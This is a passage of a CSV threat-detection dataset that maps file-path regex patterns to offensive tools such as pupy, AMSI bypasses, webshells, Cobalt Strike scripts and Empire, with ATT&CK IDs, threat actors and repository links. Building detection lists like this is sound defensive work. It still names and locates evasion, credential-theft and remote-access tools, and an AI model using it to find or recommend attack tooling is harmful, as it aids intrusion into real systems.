Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","5274" "*/Alcatraz/x64*",".{0,1000}\/Alcatraz\/x64.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","5275" "*/Alcatraz-gui*",".{0,1000}\/Alcatraz\-gui.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","5276" "*/all/pupyutils/*.py*",".{0,1000}\/all\/pupyutils\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - 
T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","5277" "*/All_attack.txt*",".{0,1000}\/All_attack\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","5278" "*/all_in_one_enum.ps1*",".{0,1000}\/all_in_one_enum\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","5279" "*/allseeingeye-info.nse*",".{0,1000}\/allseeingeye\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5280" "*/amass.log*",".{0,1000}\/amass\.log.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","10","N/A","N/A","N/A","N/A","5283" "*/amass.sqlite*",".{0,1000}\/amass\.sqlite.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","5284" "*/amass/releases/download/*",".{0,1000}\/amass\/releases\/download\/.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","1","#linux","N/A","5","","N/A","","","","5285" "*/amass/wordlists*",".{0,1000}\/amass\/wordlists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential 
Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5286" "*/amass_results_owasp.txt*",".{0,1000}\/amass_results_owasp\.txt.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","5287" "*/Amnesiac.git*",".{0,1000}\/Amnesiac\.git.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","5289" "*/Amnesiac.ps1*",".{0,1000}\/Amnesiac\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","5290" "*/amqp-info.nse*",".{0,1000}\/amqp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5294" "*/amsi.py*",".{0,1000}\/amsi\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5295" "*/Amsi_Bypass_In_2023*",".{0,1000}\/Amsi_Bypass_In_2023.{0,1000}","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windows 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","N/A","8","4","377","67","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z","5296" "*/AMSI_patch.git*",".{0,1000}\/AMSI_patch\.git.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","5297" "*/AmsiBypass.*",".{0,1000}\/AmsiBypass\..{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense
Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","5298" "*/Amsi-Bypass-Powershell.git*",".{0,1000}\/Amsi\-Bypass\-Powershell\.git.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","5299" "*/Amsi-Killer.git*",".{0,1000}\/Amsi\-Killer\.git.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","5300" "*/amsikiller.py*",".{0,1000}\/amsikiller\.py.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","5301" "*/AmsiOpenSession.exe*",".{0,1000}\/AmsiOpenSession\.exe.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","5302" "*/AMSI-Provider.git*",".{0,1000}\/AMSI\-Provider\.git.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","1","N/A","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","5303" 
"*/AMSITrigger.git*",".{0,1000}\/AMSITrigger\.git.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","5305" "*/amsiwala.exe*",".{0,1000}\/amsiwala\.exe.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","5306" "*/Analyzer-Session.log*",".{0,1000}\/Analyzer\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","#logfile #linux","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","5307" "*/AndrewSpecial.git*",".{0,1000}\/AndrewSpecial\.git.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","N/A","10","4","386","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z","5308" "*/android/pupydroid/*",".{0,1000}\/android\/pupydroid\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","5309" "*/AndroRat Binder.exe*",".{0,1000}\/AndroRat\sBinder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","QUILTED 
TIGER","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5310" "*/ANGRYPUPPY.cna*",".{0,1000}\/ANGRYPUPPY\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","5311" "*/Ani-Shell.php*",".{0,1000}\/Ani\-Shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by 
famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5312" "*/Annoying1.exe*",".{0,1000}\/Annoying1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5313" "*/anonymous rat v1.0.exe*",".{0,1000}\/anonymous\srat\sv1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5314" "*/Ant Attack.exe*",".{0,1000}\/Ant\sAttack\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5315" "*/antak.aspx*",".{0,1000}\/antak\.aspx.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","5316" "*/anthemtotheego/CredBandit*",".{0,1000}\/anthemtotheego\/CredBandit.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice 
Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/CredBandit","1","1","N/A","N/A","10","10","240","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z","5317" "*/anti_analysis.exe*",".{0,1000}\/anti_analysis\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","5318" "*/anti_debug.exe*",".{0,1000}\/anti_debug\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","5319" "*/anti_methods/antivm.ps1*",".{0,1000}\/anti_methods\/antivm\.ps1.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","1","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","5320" "*/Antichat Shell v1.3.php*",".{0,1000}\/Antichat\sShell\sv1\.3\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5321" 
"*/AntiSandbox.go*",".{0,1000}\/AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5322" "*/AntiSandbox.go*",".{0,1000}\/AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5323" "*/AntiTamper.exe*",".{0,1000}\/AntiTamper\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","5324" "*/antSword.git*",".{0,1000}\/antSword\.git.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5325" "*/antsword.tar*",".{0,1000}\/antsword\.tar.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5326" 
"*/antsword.tar.gz*",".{0,1000}\/antsword\.tar\.gz.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5327" "*/AntSword/archive/master.tar*",".{0,1000}\/AntSword\/archive\/master\.tar.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5328" "*/antSword/releases/tag/2*",".{0,1000}\/antSword\/releases\/tag\/2.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5329" "*/AntSword_*.php*",".{0,1000}\/AntSword_.{0,1000}\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5330" "*/antSword-master.zip*",".{0,1000}\/antSword\-master\.zip.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - 
supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5331" "*/antx-code/CVE-2022-0847*",".{0,1000}\/antx\-code\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/antx-code/CVE-2022-0847","1","1","N/A","N/A","N/A","1","58","21","2022-03-08T09:14:25Z","2022-03-08T09:10:51Z","5332" "*/AoratosWin/*",".{0,1000}\/AoratosWin\/.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","5337" "*/APC_Injection.cpp*",".{0,1000}\/APC_Injection\.cpp.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","1","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","5339" "*/apc_injection.exe*",".{0,1000}\/apc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","5340" 
"*/APCLdr.*",".{0,1000}\/APCLdr\..{0,1000}","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","N/A","4","316","54","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z","5341" "*/api/admin/shutdown?token=*",".{0,1000}\/api\/admin\/shutdown\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - 